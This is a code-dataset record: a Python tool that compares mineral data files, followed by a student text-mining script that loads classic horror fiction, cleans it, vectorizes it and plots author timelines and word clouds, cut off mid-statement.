python3\n\nfrom argparse import ArgumentParser, Namespace\nimport pandas as pd\nfrom typing import List\n\nfrom .core import RequiredFields\nfrom .tool import SteinbitTool\nfrom .create import SteinbitCreate\n\n\nEPSILON = 0.01\n\n\ndef has_percent_row(minerals: List[str], df: pd.DataFrame) -> bool:\n \"\"\"\n Return true if this frame has a percentage row\n \"\"\"\n return any(abs(x - 100) < EPSILON for x in df[minerals].sum(axis=1))\n\n\nclass SteinbitCompare(SteinbitTool):\n\n @classmethod\n def add_arguments(cls, parser: ArgumentParser):\n \"\"\"\n Add command line arguments for the compare tool\n \"\"\"\n parser.set_defaults(clazz=cls)\n parser.add_argument(\n 'file1', type=str, nargs=1,\n help='The first file to compare')\n parser.add_argument(\n 'file2', type=str, nargs=1,\n help='The second file to compare')\n\n def run(self, args: Namespace):\n \"\"\"\n Compare files by automatically applying any\n required translations\n \"\"\"\n create = SteinbitCreate(self.config)\n frame1 = create.process_files(args.file1)\n frame2 = create.process_files(args.file2)\n\n if frame1.requires_translation() or frame2.requires_translation():\n print(\"Frames require translation...\")\n frame1.translate()\n frame2.translate()\n result1 = frame1.result()\n result2 = frame2.result()\n minerals = frame1.minerals()\n\n if any(has_percent_row(minerals, r) for r in [result1, result2]):\n print(\"Converting to percentage-based\")\n result1 = create.percentages(result1)\n result2 = create.percentages(result2)\n\n columns = set(result1.columns).intersection(result2.columns)\n extra1 = set(result1.columns) - columns\n extra2 = set(result2.columns) - columns\n\n print(\"Comparison result:\")\n if extra1:\n print(\"Extra columns in %s: [%s]\" % (\n args.file1[0],\n \", \".join(extra1)))\n if extra2:\n print(\"Extra columns in %s: [%s]\" % (\n args.file2[0],\n \", \".join(extra2)))\n print(\"-\" * 40)\n result1.set_index(RequiredFields.DEPTH.value, inplace=True, drop=False)\n result2.set_index(RequiredFields.DEPTH.value, inplace=True, drop=False)\n comparison = result1[columns].compare(result2[columns])\n if len(comparison.index) == 0:\n print(\"File data in matching columns is identical\")\n else:\n print(comparison.rename(columns={\n 'self': args.file1[0], 'other': args.file2[0]}))\n","sub_path":"steinbit/compare.py","file_name":"compare.py","file_ext":"py","file_size_in_byte":2661,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"79"} +{"seq_id":"355278759","text":"# \n# IST 736 - Text Mining \n# Final Project: the horror passage\n# Author: Becky Matthews-Pease, Rohini Shrivastava, Joyce Woznica\n# Date: TBD 2021\n#\n###------------------------------------ Import Packages ---------------------------------------\n# In this section, the packages required for the code are loaded\n# These are the packages required for the entire program and no\n# other imports are used later in the code\n\nimport pandas as pd\nimport numpy as np\n\n# for manipulating strings\nimport string\n# for regular expressions\nimport re\n# after pip install clean-text\nfrom cleantext import clean\n# help with lists and tuples\nfrom operator import itemgetter\n\n# packages for wordclouds\n# note - must install wordcloud\n# conda install -c conda-forge wordcloud\nimport collections\nfrom wordcloud import WordCloud, STOPWORDS, ImageColorGenerator\nfrom PIL import Image\n\n# for plotting\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nfrom matplotlib import cm\nfrom matplotlib.colors import ListedColormap, LinearSegmentedColormap\n\n# for colors\n#from colour import Color\nimport random\nimport matplotlib.colors as mcolors\n\n# Import packages\nimport nltk\nfrom nltk.tokenize import word_tokenize\nfrom nltk.probability import FreqDist\nfrom nltk.corpus import stopwords\nfrom nltk.tokenize import WordPunctTokenizer\nfrom nltk.collocations import *\nimport os, fnmatch\n\nimport sklearn\nfrom sklearn.feature_extraction.text import CountVectorizer\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nfrom nltk.tokenize import word_tokenize, sent_tokenize\n# for lemmatization\nfrom nltk.stem.wordnet import WordNetLemmatizer\n## For Stemming\nfrom nltk.stem import PorterStemmer\nfrom nltk.stem.snowball import SnowballStemmer\nfrom nltk.stem.lancaster import LancasterStemmer\n\nfrom sklearn.model_selection import train_test_split\nimport random as rd\n\n# import stuff for sklearn - we use this for plotting things later\nfrom sklearn import datasets, metrics\nfrom sklearn.metrics import confusion_matrix\nfrom sklearn.metrics import accuracy_score\nfrom sklearn.metrics import recall_score\nfrom sklearn.metrics import precision_score\nfrom sklearn.metrics import f1_score\nfrom sklearn.metrics import classification_report\nfrom sklearn.utils import shuffle\n\n# for classification and prediction\nfrom sklearn import preprocessing\nfrom sklearn.svm import LinearSVC\nfrom sklearn.naive_bayes import MultinomialNB\nfrom sklearn.naive_bayes import BernoulliNB\nfrom sklearn.model_selection import cross_val_predict\nfrom sklearn.naive_bayes import GaussianNB\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.pipeline import Pipeline\nfrom sklearn.model_selection import cross_val_score\n\n# some imports for SVM\nfrom sklearn import preprocessing\nfrom sklearn.svm import LinearSVC\nfrom sklearn.svm import SVC\nfrom sklearn import svm\nfrom sklearn.preprocessing import LabelBinarizer\n\n# try PCA\nfrom sklearn.decomposition import PCA\nimport pylab as pl\n\nfrom sklearn.decomposition import NMF, LatentDirichletAllocation, TruncatedSVD\n\n###----------------------------------- Get Directories and Files ------------------------------\n# directories for corpuses\nblackwoodDir = '/Users/joycewoznica/Syracuse/IST736/Project/data/blackwood/'\npoeDir = '/Users/joycewoznica/Syracuse/IST736/Project/data/poe/'\nstokerDir = '/Users/joycewoznica/Syracuse/IST736/Project/data/stoker/'\njamesDir = '/Users/joycewoznica/Syracuse/IST736/Project/data/james/'\n\n# the test files are in predictDir\npredictDir = '/Users/joycewoznica/Syracuse/IST736/Project/data/predict/'\n# list of directories\ndirList = [blackwoodDir, poeDir, stokerDir, jamesDir]\n\n# list of files for each corpus\nblackwoodFileList = fnmatch.filter(os.listdir(blackwoodDir), '*.txt')\npoeFileList = fnmatch.filter(os.listdir(poeDir), '*.txt')\nstokerFileList = fnmatch.filter(os.listdir(stokerDir), '*.txt')\njamesFileList = fnmatch.filter(os.listdir(jamesDir), '*.txt')\n\n# this is the test set\npredictFileList = fnmatch.filter(os.listdir(predictDir), '*.txt')\n#predictFileList = fnmatch.filter(os.istdir())\n# list of file lists\nfileLists = [blackwoodFileList, poeFileList, stokerFileList, jamesFileList]\n\ndef build_fullpath(listName, filedir):\n listName = []\n for path in os.listdir(filedir):\n full_path = os.path.join(filedir, path)\n listName.append(full_path)\n return listName\n\n# build lists (empty) for fullpaths\nblackwoodFullPath = []\npoeFullPath = []\nstokerFullPath = []\njamesFullPath = []\n# for predicted\npredictFullPath = []\n\n# full path names\nblackwoodFullPath = build_fullpath(blackwoodFileList, blackwoodDir)\npoeFullPath = build_fullpath(poeFileList, poeDir)\nstokerFullPath = build_fullpath(stokerFileList, stokerDir)\njamesFullPath = build_fullpath(stokerFileList, jamesDir)\n# predicted\npredictFullPath = build_fullpath(predictFileList, predictDir)\n# remember the author is in front of the \"_\" for this one\n\n# build author Dictionary\n# empty dictionary\nauthor_dict = {}\n# empty dictionary\nauthor_dict2 = {}\npredict_author_dict = {}\n# dictionary with integer keys\nauthor_dict = {'blackwood': 'Algernon Blackwood',\n 'poe': 'Edgar Allen Poe', \n 'stoker': 'Bram Stoker',\n 'james': 'M. R. James'}\n\nauthor_dict2 = {'blackwood': 'Algernon Blackwood',\n 'poe': 'Edgar Allen Poe', \n 'stoker': 'Bram Stoker',\n 'james': 'M. R. James',\n 'all': 'Blackwood, Poe, Stoker and James',\n 'predict': 'Short Story Authors'}\n\n# need predicted author dictionary\npredict_author_dict = {'blackwood': 'Algernon Blackwood',\n 'burke': 'Thomas Burke',\n 'curzon': 'George Curzon',\n 'debra': 'Lemuel De Bra',\n 'delamare': 'Walter de la Mare',\n 'doyle': 'A. Conan Doyle',\n 'golding': 'Louis Golding',\n 'hichens': 'Robert Hichens',\n 'hyne': 'Cutliffe Hyne',\n 'jacobs': 'W. W. Jacobs',\n 'lewis': 'M. G. Lewis',\n 'lynch': 'Arthur Lynch',\n 'masefield': 'John Masefield',\n 'mason': 'A. W. Mason',\n 'maugham': 'W. Somerset Maugham',\n 'mordaunt': 'Elinor Mordaunt',\n 'muir': 'Ward Muir',\n 'powys': 'T. F. Powys',\n 'pugh': 'Edwin Pugh',\n 'robertsm': 'Morley Roberts',\n 'robertsr': 'R. Ellis Roberts',\n 'stacpoole': 'H. De Vere Stacpoole',\n 'shelley': 'Mary Shelley',\n 'walpole': 'Horace Walpole',\n 'wharton': 'Edith Wharton',\n 'yeats': 'W. B. Yeats',\n 'poe': 'Edgar Allen Poe', \n 'stoker': 'Bram Stoker',\n 'james': 'M. R. James'\n }\n\n# Joyce to build a book_dict as well\nbook_dict = {}\n# dictionary with integer keys\nbook_dict = {\n # Blackwood Works\n '3johnsilencestories': 'Three John Silence Stories',\n '3morejohnsilencestories': 'Three More John Silence Stories',\n 'aprisoneroffairyland': 'A Prisoner of Fairyland',\n 'dayandnightstories': 'Day and Night Stories',\n 'fourweirdtales': 'Four Weird Tales',\n 'incredibleadventures': 'Incredible Adventures',\n 'thebrightmessenger': 'The Bright Messenger',\n 'thecentaur': 'The Centaur',\n 'thedamned': 'The Damned',\n 'theemptyhouseandotherghoststories': 'The Empty House and Other Ghost Stories',\n 'thegardenofsurvival': 'The Garden of Survival',\n 'thehumanchord': 'The Human Chord',\n 'themanwhomthetreesloved': 'The Man Whom the Trees Loved',\n 'thewave': 'The Wave',\n 'thewendigo': 'The Wendigo',\n 'thewillows': 'The Willows',\n \n # James Works\n #'athinghostandotherstories': 'A Thin Ghost and Other Stories',\n 'theresidentatwhitminster': 'The Resident at Whitminster',\n 'thediaryofmrpoynter': 'The Diary of Mr\\. Poytner',\n 'anepisodeofcathedralhistory': 'An Episode of Cathedral History',\n 'thestoryofadisapperanceandanappearance': 'The Story of a Disappearance and an Appearance',\n 'twodoctors': 'Two Doctors',\n #'ghoststoriesofantiquary': 'Ghost Stories of Antiquary',\n 'losthearts': 'Lost Hearts',\n 'countmagnus': 'Count Magnus',\n 'theashtree': 'The Ash-Tree',\n 'themezzotint': 'The Mezzotint',\n #'ghoststoriesofantiquarypart2': 'Ghost Stories of Antiquary Part 2',\n 'aschoolstory': 'A School Story',\n 'castingtherunes': 'Casting the Runes',\n 'martinsclose': 'Martin\\'s Close',\n 'mrhumphreysandhisinheritance': 'Mr Humphreys and His Inheritance',\n 'therosegarden': 'The Rose Garden',\n 'thestallsofbarchestercathedral': 'The Stalls of Barchester Cathedral',\n 'thetractatemiddoth': 'The Tractate Middoth',\n #\n 'thefivejars': 'The Five Jars',\n #'talesofterrorandwonder': 'Tales of Terror and Wonder',\n #'theanaconda': 'The Anaconda',\n #'thebravoofvenice': 'The Bravo of Venice',\n \n # Poe Works\n 'thecaskofamontillado': 'The Cask of Amontillado',\n 'thefallofthehouseofusher': 'The Fall of the House of Usher',\n 'themasqueofthereddeath': 'The Masque of the Red Death',\n 'theraven': 'The Raven',\n #'theworksofedgarallenpoev1': 'The Works of Edgar Allen Poe Volume 1',\n 'themurdersofruemorgue': 'The Murders of the Rue Morgue',\n 'theovalportrait': 'The Oval Portrait',\n 'theunparalleledadventuresofonehanspfaall': 'The Unparalleled Adventures of One Hans Pfaall',\n #'theworksofedgarallenpoev2': 'The Works of Edgar Allen Poe Volume 2',\n 'thepitandthependulum': 'The Pit and the Pendulum',\n 'thetelltaleheart': 'The Tell-Tale Heart',\n 'theprematureburial': 'The Premature Burial',\n #'theworksofedgarallenpoev3': 'The Works of Edgar Allen Poe Volume 3',\n \n #'theworksofedgarallenpoev4': 'The Works of Edgar Allen Poe Volume 4',\n 'theoblongbox': 'The Oblong Box',\n 'thelandscapegarden': 'The Landscape Garden',\n 'lossofbreath': 'Loss of Breath',\n 'metzengerstein': 'Metzengerstein', \n 'thedevilinthebelfry': 'The Devil in the Belfry',\n #'theworksofedgarallenpoev5': 'The Works of Edgar Allen Poe Volume 5',\n 'ataleofjerusalem': 'A Tale of Jerusalem',\n 'somewordswithamummy': 'Some Words with a Mummy',\n \n # Stoker Works\n 'dracula': 'Dracula',\n #'draculasguest': 'Dracula\\'s Guest',\n 'draculasguest': 'Dracula\\'s Guest',\n 'crookensands': 'Crooken Sands',\n 'thejudgeshouse': 'The Judge\\'s House',\n 'theburialofrats': 'The Burial of Rats',\n 'thecomingofabelbehenna': 'The Coming of Abel Behenna',\n 'thesecretofthegrowinggold': 'The Secret of the Growing Gold',\n 'thesquaw': 'The Squaw',\n 'thegipsyprophecy': 'The Gipsy Prophecy', \n #\n 'lairofthewhiteworm': 'Lair of the White Worm',\n 'thejewelofsevenstars': 'The Jewel of Seven Stars',\n 'theladyoftheshroud': 'The Lady of the Shroud',\n 'theman': 'The Man',\n 'thesnakespass': 'The Snake\\'s Pass',\n 'themysteryofthesea': 'The Mystery of the Sea',\n \n # Predict Set of Books + one of each of 4 main authors \n 'adreamofredhands': 'A Dream of Red Hands',\n 'violence': 'Violence',\n 'thechinkandthechild': 'The Chink and the Child',\n 'thedrumsofkairwan': 'The Drums of Kairwan',\n 'alifeabowlofrice': 'A Life a Bowl of Rice',\n 'thecreatures': 'The Creatures',\n 'captainsharkey': 'Captain Sharkey',\n 'thecallofthehand': 'The Call of the Hand',\n 'frankenstein': 'Frankenstein',\n 'thenomad': 'The Nomad',\n 'number13': 'Number 13',\n 'theransom': 'The Ransom',\n 'themonkeyspaw': 'The Monkey\\'s Paw',\n 'themonk': 'The Monk',\n 'thesentimentalmortgage': 'The Sentimental Mortgage',\n 'davyjonessgift': 'Davy Jones\\'s Gift',\n 'hatteras': 'Hatteras',\n 'thetaipan': 'The Taiapn',\n 'hodge': 'Hodge',\n 'therewardofenterprise': 'The Reward of Enterprise',\n 'alleluia': 'Alleluia',\n 'theothertwin': 'The Other Twin',\n 'grearsdam': 'Grear\\'s Dam',\n 'thenarrowway': 'The Narrow Way',\n 'thekingofmaleka': 'The King of Maleka',\n 'kerfol': 'Kerfol',\n 'thegoldbug': 'The Gold Bug',\n 'thecrucifixionoftheoutcast': 'The Crucifixion of the Outcast',\n 'thecastleofotranto': 'The Castle of Oranto'\n }\n\n#------------------------------- Publishing Information --------------------------------------\n# initialize list of lists \nauthorDF = [[1, 'Edgar Allen Poe', 1809, 1849, 1827], \n [2, 'Bram Stoker', 1847, 1912, 1897],\n [3, 'M.R. James', 1862, 1936, 1904],\n [4, 'Algernon Blackwood', 1869, 1951, 1909],\n [5, 'Thomas Burke', 1886, 1945, 1961],\n [6, 'George Curzon', 1859, 1925, 1915],\n [7, 'Lemuel De Bra', 1884, 1954, 1925],\n [8, 'Walter de la Mare', 1873, 1956, 1902],\n [9, 'A. Conan Doyle', 1859, 1930, 1892],\n [10, 'Louis Golding', 1895, 1958, 1919],\n [11, 'Robert Hichens', 1864, 1950, 1886],\n [12, 'Cutliffe Hyne', 1866, 1944, 1900],\n [13, 'W. W. Jacobs', 1863, 1943, 1885],\n [14, 'M. G. Lewis', 1775, 1818, 1796],\n [15, 'Arthur Lynch', 1861, 1934, 1893],\n [16, 'John Masefield', 1878, 1967, 1902],\n [17, 'A. W. Mason', 1865, 1948, 1895],\n [18, 'W. Somerset Maugham', 1874, 1965, 1897],\n [19, 'Elinor Mordaunt', 1872, 1942, 1902],\n [20, 'Ward Muir', 1878, 1927, 1917],\n [21, 'T. F. Powys', 1875, 1953, 1927],\n [22, 'Morley Roberts', 1857, 1942, 1887],\n [23, 'R. Ellis Roberts', 1879, 1953, 1938],\n [24, 'H. De Vere Stacpoole', 1863, 1951, 1908],\n [25, 'Mary Shelley', 1797, 1851, 1807],\n [26, 'Horace Walpole', 1717, 1797, 1764],\n [27, 'Edith Wharton', 1862, 1937, 1905],\n [28, 'W. B. Yeats', 1865, 1939, 1886]]\n\n# Create the pandas DataFrame \nauthorDF = pd.DataFrame(authorDF, columns = ['Row', 'Author', 'BirthYear', 'DeathYear', 'FirstPubYear']) \n\n#------------------------------- Publishing TimeLine ------------------------------------------\nauthor_names = authorDF['Author']\norder = []\nplt.rcParams['figure.figsize']=11,8\nax = plt.gca()\nfor index, author in authorDF.iterrows():\n x_vals = []\n y_vals = []\n y_vals = [author['Row'], author['Row'], author['Row']]\n x_vals = [author['BirthYear'], author['FirstPubYear'], author['DeathYear']]\n mymark = 'o'\n myline = 'solid'\n mylabel = author['Author']\n \n if mylabel == 'Edgar Allen Poe' or mylabel == 'Bram Stoker' or mylabel == 'M.R. James' or mylabel == 'Algernon Blackwood':\n mymark = 's'\n myline = 'dashed'\n\n plt.plot(x_vals, y_vals, marker = mymark, label = mylabel, linestyle = myline)\n o = 27 - index\n order = order + [o]\n \nplt.title(\"Author Birthdate, First Publication Date, Date of Death\", fontsize = 12)\nplt.xlabel(\"Dates\", fontsize = 10)\nhandles, labels = ax.get_legend_handles_labels()\nplt.legend([handles[idx] for idx in order],[labels[idx] for idx in order],\n shadow=True, fancybox=True, \n loc='right', bbox_to_anchor = (1.3, 0.5)) \nax.axes.yaxis.set_visible(False)\nax.set_xlim(1705, 1975)\nplt.show()\n\n#-------------------------------- Clean the data ----------------------------------------------\n# get rid of headers and footers that are gutenberg specific\n# first need to remove all the header and footer standard gutenbert stuff - should be able to\n# do with line numbers\n#------------------------------\n\n# create a function passing the dataframe and the column and run all these\n# functions to clean them up\ndef remove_punct_more(book_string):\n # remove new lines from text\n # need to fix this one\n # need to remove illustrations\n # ** JOYCE TO TEST THIS LINE **\n book_string = book_string.replace('\\[Illustration\\]', '')\n # should consider removing Chapter #\n book_string = book_string.replace(r\"\\\\t|\\\\n|\\\\r\", \"\")\n book_string = book_string.replace(\"\\t|\\n|\\r\", \"\")\n # replace the \\ in from of the apostrophes\n book_string = book_string.replace(r\"[\\\\,]\", \"\")\n # remove the apostrophe at the beginning on each line\n book_string = book_string.replace(r\"(^\\')\", \"\")\n # remove the apostrophe at the end of each line\n book_string = book_string.replace(r\"(\\'$)\", \"\")\n # remove digits (numbers) from the text\n # 3/3 - this isn't working\n #book_string = book_string.replace(r'[0-9]+', '')\n book_string = re.sub(r'\\d+', '', book_string)\n # remove special (punctuation) characters\n # 3/3 - maybe fix this with individual replaces?\n spec_chars = [\"!\",'\"',\"#\",\"%\",\"&\",\"(\",\")\",\"_\",\n \"*\",\"+\",\",\",\"-\",\".\",\"/\",\":\",\";\",\"<\",\n \"=\",\">\",\"?\",\"@\",\"[\",\"\\\\\",\"]\",\"^\",\"_\",\n \"`\",\"{\",\"|\",\"}\",\"~\",\"–\",\"—\",\"'\",'“',\"’\",'”']\n for char in spec_chars:\n book_string = book_string.replace(char, ' ')\n # now remove the extra white space\n # ** need to fix these multiple spaces **\n #book_string = book_string.replace(' +', ' ')\n book_string = re.sub(' +', ' ', book_string)\n return book_string\n\n# Read in the text files for each book selected\n# empty DF of the author and each book\ndef read_book (author, fullPathList):\n bookDF = pd.DataFrame(columns = ['book_author', 'book_name', 'book_text'])\n # we can put the author in now and the book name as we process this\n for book in fullPathList:\n # extract the book name\n temp = book.split('/')\n fname = temp[len(temp)-1]\n book_name = fname.split('.')[0]\n # open book for reading\n book_text = open(book, 'r')\n # get raw data\n book_raw = book_text.read()\n # get number of lines\n book_lines = book_raw.split('\\n')\n # could use this\n # kill the end of the book (last 365)\n # 3/2 - need to modify this to remove everything above this line\n # *** START OF THIS PROJECT GUTENBERG EBOOK ... up to the \\n\n book_lines = book_lines[0:len(book_lines)-365]\n # kill the first few lines of the book (first 30)\n # 3/2 - need to modify this to remove everything below this line\n # *** END OF THIS PROJECT GUTENBERG EBOOK ... to \\n\n book_lines = book_lines[27:len(book_lines)]\n # put it all back as a single text object\n # using list comprehension \n blinesToStr = ' '.join([str(elem) for elem in book_lines]) \n # send it for cleaning as a big chunk\n clean_bookText = remove_punct_more(blinesToStr)\n # close the book\n book_text.close()\n # now need to add the booktext to the dataframe\n df_row = {'book_author': author,\n 'book_name': book_name,\n 'book_text': clean_bookText}\n # append the row to the bookDF\n bookDF = bookDF.append(df_row, ignore_index = True)\n return bookDF\n \n# this should return a dataframe of the author, book name and cleaned text for CountVectorizer\n# Now call for each author\n# blackwood, poe, stoker, james\n\n# Blackwood\nblackwoodDF = []\nblackwoodDF = read_book('blackwood', blackwoodFullPath)\n\n# Poe\npoeDF = []\npoeDF = read_book('poe', poeFullPath)\n# issue with the Raven - but works for Poe - need to extract the allocolades to Poe\n# what to do with the volumes texts\n\n# Stoker\nstokerDF = []\nstokerDF = read_book('stoker', stokerFullPath)\n\n# James\njamesDF = []\njamesDF = read_book('james', jamesFullPath)\n\n# special read for the predict to split out the book and author name \n# can combine the functions passing 'test' or 'train', but for now\n# two functions\ndef read_predict_book (fullPathList):\n bookDF = pd.DataFrame(columns = ['book_author', 'book_name', 'book_text'])\n # we can put the author in now and the book name as we process this\n for book in fullPathList:\n #print('Book is ', book)\n # extract the book name\n temp = book.split('/')\n fname = temp[len(temp)-1]\n author = fname.split('_')[0]\n temp = fname.split('_')[1]\n book_name = temp.split('.')[0]\n # open book for reading\n book_text = open(book, 'r')\n # get raw data\n book_raw = book_text.read()\n # get number of lines\n book_lines = book_raw.split('\\n')\n # could use this\n # kill the end of the book (last 365)\n book_lines = book_lines[0:len(book_lines)-365]\n # kill the first few lines of the book (first 30)\n book_lines = book_lines[30:len(book_lines)]\n # put it all back as a single text object\n # using list comprehension \n blinesToStr = ' '.join([str(elem) for elem in book_lines]) \n # send it for cleaning as a big chunk\n clean_bookText = remove_punct_more(blinesToStr)\n # close the book\n book_text.close()\n # now need to add the booktext to the dataframe\n df_row = {'book_author': author,\n 'book_name': book_name,\n 'book_text': clean_bookText}\n # append the row to the bookDF\n bookDF = bookDF.append(df_row, ignore_index = True)\n return bookDF\n\npredictDF = []\npredictDF = read_predict_book(predictFullPath)\n\n# join all frames together for joint vectorization\n# build a single DF for all the four source authors\nframes = [blackwoodDF, poeDF, stokerDF, jamesDF]\nallframes = [blackwoodDF, poeDF, stokerDF, jamesDF, predictDF]\nbookDF = pd.concat(frames)\nallbookDF = pd.concat(allframes)\n# reindex\nbookDF.reset_index(inplace=True, drop=True)\nallbookDF.reset_index(inplace=True, drop=True)\n\n#-------------------------------- Vectorization for MultinomialNB ---------------------------\n# ** NOTE: this is using non-stemmed data **\n# Create an instance of CountVectorizer (one for the corpus)\n# now that we have good, clean data\nblackwoodCV = CountVectorizer(input = 'content', \n analyzer = 'word',\n stop_words='english')\npoeCV = CountVectorizer(input = 'conent', \n analyzer = 'word',\n stop_words='english')\nstokerCV = CountVectorizer(input = 'content',\n analyzer = 'word',\n stop_words='english')\njamesCV = CountVectorizer(input = 'content',\n analyzer = 'word',\n stop_words = 'english')\nbookCV = CountVectorizer(input = 'content',\n analyzer = 'word',\n stop_words = 'english')\npredictCV = CountVectorizer(input = 'content',\n analyzer = 'word',\n stop_words = 'english')\nallbookCV = CountVectorizer(input = 'content',\n analyzer = 'word',\n stop_words = 'english')\n\n# add a stemmer\nSTEMMER=PorterStemmer()\n#print(STEMMER.stem(\"fishings\"))\n\n# Use NLTK's PorterStemmer in a function\ndef MY_STEMMER(str_input): #I like dogs a lot111 !!\"\n words = re.sub(r\"[^A-Za-z\\-]\", \" \", str_input).lower().split() \n words = [STEMMER.stem(w) for w in words]\n return words\n\nallbookCV_STEM = CountVectorizer(input = 'content',\n analyzer = 'word',\n tokenizer = MY_STEMMER,\n stop_words = 'english')\n\n\n# build total list of just the book text\nblackwood_text_list = blackwoodDF['book_text'].tolist()\npoe_text_list = poeDF['book_text'].tolist()\nstoker_text_list = stokerDF['book_text'].tolist()\njames_text_list = jamesDF['book_text'].tolist()\nbook_text_list = bookDF['book_text'].tolist()\npredict_text_list = predictDF['book_text'].tolist()\nallbook_text_list = allbookDF['book_text'].tolist()\n\n# execute the transform and then get the feature names (the word - vocabulary)\nblackwoodDTM = blackwoodCV.fit_transform(blackwood_text_list)\npoeDTM = poeCV.fit_transform(poe_text_list)\nstokerDTM = stokerCV.fit_transform(stoker_text_list)\njamesDTM = jamesCV.fit_transform(james_text_list)\nbookDTM = bookCV.fit_transform(book_text_list)\npredictDTM = predictCV.fit_transform(predict_text_list)\nallbookDTM = allbookCV.fit_transform(allbook_text_list)\nallbookDTM_STEM = allbookCV_STEM.fit_transform(allbook_text_list)\n\n# create the vocabulary list by running feature_names - features being words\nblackwoodVocab = blackwoodCV.get_feature_names()\npoeVocab = poeCV.get_feature_names()\nstokerVocab = stokerCV.get_feature_names()\njamesVocab = jamesCV.get_feature_names()\nbookVocab = bookCV.get_feature_names()\npredictVocab = predictCV.get_feature_names()\nallbookVocab = allbookCV.get_feature_names()\nallbookVocab_STEM = allbookCV_STEM.get_feature_names()\n\n# finally put these in a dataframe - one for each corpus\n# this is what is used for test_train\nblackwoodVectorDF = pd.DataFrame(blackwoodDTM.toarray(), columns = blackwoodVocab)\npoeVectorDF = pd.DataFrame(poeDTM.toarray(), columns = poeVocab)\nstokerVectorDF = pd.DataFrame(stokerDTM.toarray(), columns = stokerVocab)\njamesVectorDF = pd.DataFrame(jamesDTM.toarray(), columns = jamesVocab)\nbookVectorDF = pd.DataFrame(bookDTM.toarray(), columns = bookVocab)\npredictVectorDF = pd.DataFrame(predictDTM.toarray(), columns = predictVocab)\nallbookVectorDF = pd.DataFrame(allbookDTM.toarray(), columns = allbookVocab)\nallbookVectorDF_STEM = pd.DataFrame(allbookDTM_STEM.toarray(), columns = allbookVocab_STEM)\n\n# now we need to \"attach\" the author to each frame\nblackwoodLabel = blackwoodDF['book_author']\n# array for author labels\nblackwoodLabelArray = blackwoodLabel.to_numpy()\npoeLabel = poeDF['book_author']\npoeLabelArray = poeLabel.to_numpy()\nstokerLabel = stokerDF['book_author']\nstokerLabelArray = stokerLabel.to_numpy()\njamesLabel = jamesDF['book_author']\njamesLabelArray = jamesLabel.to_numpy()\nbookLabel = bookDF['book_author']\nbookLabelArray = bookLabel.to_numpy()\npredictLabel = predictDF['book_author']\npredictLabelArray = predictLabel.to_numpy()\nallbookLabel = allbookDF['book_author']\nallbookLabelArray = allbookLabel.to_numpy()\n\n# make copies of the final DF, so we can add the label column\nblackwoodLabelVectorDF = blackwoodVectorDF.copy()\npoeLabelVectorDF = poeVectorDF.copy()\nstokerLabelVectorDF = stokerVectorDF.copy()\njamesLabelVectorDF = jamesVectorDF.copy()\nbookLabelVectorDF = bookVectorDF.copy()\npredictLabelVectorDF = predictVectorDF.copy()\nallbookLabelVectorDF = allbookVectorDF.copy()\nallbookLabelVectorDF_STEM = allbookVectorDF_STEM.copy()\n\n# insert label into position 0 (first) to *each* dataframe\n# this is the *CountVectorizer* vector - no Binary, no TFIDF\nblackwoodLabelVectorDF.insert(0, 'book_author', blackwoodLabel)\npoeLabelVectorDF.insert(0, 'book_author', poeLabel)\nstokerLabelVectorDF.insert(0, 'book_author', stokerLabel)\njamesLabelVectorDF.insert(0, 'book_author', jamesLabel)\nbookLabelVectorDF.insert(0, 'book_author', bookLabel)\npredictLabelVectorDF.insert(0, 'book_author', predictLabel)\nallbookLabelVectorDF.insert(0, 'book_author', allbookLabel)\nallbookLabelVectorDF_STEM.insert(0, 'book_author', allbookLabel)\n\n###------------------------------------- Word Cloud Analysis -----------------------------------------\n# Using the vocabulary list - do a wordcloud\n# first we need to somehow rank the words by most common\n# ranking of the words\n\n# set stopwords\nmy_stopwords = set(nltk.corpus.stopwords.words('english'))\nmy_stopwords.update('gutenberg')\n\ndef plot_wordcloud (vocab, author, numwords):\n author_name = author_dict2.get(author)\n graph_title = \"Top \" + str(numwords) + \" (less stopwords) Most Common Words in \" + author_name\n # remove only standard 192 stop words\n wordcloud_text = WordCloud(stopwords=my_stopwords, collocations=False, background_color=\"black\", \n colormap = 'RdGy',\n prefer_horizontal = 0.85,\n max_font_size= 30, max_words=numwords).generate(' '.join(vocab))\n # show the plot\n plt.figure(figsize = (15,15))\n plt.axis(\"off\")\n plt.imshow(wordcloud_text, interpolation='bilinear')\n plt.title(graph_title, fontsize = 16)\n plt.show()\n\n# code from this source: \n# https://kavita-ganesan.com/how-to-use-countvectorizer/#Using-CountVectorizer-to-Extract-N-Gram-Term-Counts\ndef sort_coo(coo_matrix):\n tuples = zip(coo_matrix.col, coo_matrix.data)\n return sorted(tuples, key=lambda x: (x[1], x[0]), reverse=True)\n \ndef extract_topn_from_vector(feature_names, sorted_items, topn=10):\n \"\"\"return n-gram counts in descending order of counts\"\"\"\n #use only topn items from vector\n sorted_items = sorted_items[:topn]\n score_vals = []\n feature_vals = []\n results=[]\n # word index, count i\n for idx, count in sorted_items:\n # get the ngram name\n n_gram=feature_names[idx]\n # collect as a list of tuples\n results.append((n_gram,count))\n return results\n\n# Use the functions\n# Blackwood Wordcloud\nwords_only = list(map(itemgetter(0), \n extract_topn_from_vector(blackwoodVocab, \n sort_coo(blackwoodDTM[0].tocoo()),300)))\nplot_wordcloud(words_only, 'blackwood', 250)\n\n# Poe Wordcloud\nwords_only = list(map(itemgetter(0), \n extract_topn_from_vector(poeVocab, \n sort_coo(poeDTM[0].tocoo()),300)))\nplot_wordcloud(words_only, 'poe', 250)\n\n# Stoker Wordcloud\nwords_only = list(map(itemgetter(0), \n extract_topn_from_vector(stokerVocab, \n sort_coo(stokerDTM[0].tocoo()),300)))\nplot_wordcloud(words_only, 'stoker', 250)\n\n# James Wordcloud\nwords_only = list(map(itemgetter(0), \n extract_topn_from_vector(jamesVocab, \n sort_coo(jamesDTM[0].tocoo()),300)))\nplot_wordcloud(words_only, 'james', 250)\n\n# Book Wordcloud\nwords_only = list(map(itemgetter(0), \n extract_topn_from_vector(bookVocab, \n sort_coo(bookDTM[0].tocoo()),500)))\nplot_wordcloud(words_only, 'all', 450)\n\n# Book Wordcloud\nwords_only = list(map(itemgetter(0), \n extract_topn_from_vector(predictVocab, \n sort_coo(predictDTM[0].tocoo()),500)))\nplot_wordcloud(words_only, 'predict', 450)\n\n# ALL Books Wordclod\n# Book Wordcloud\nwords_only = list(map(itemgetter(0), \n 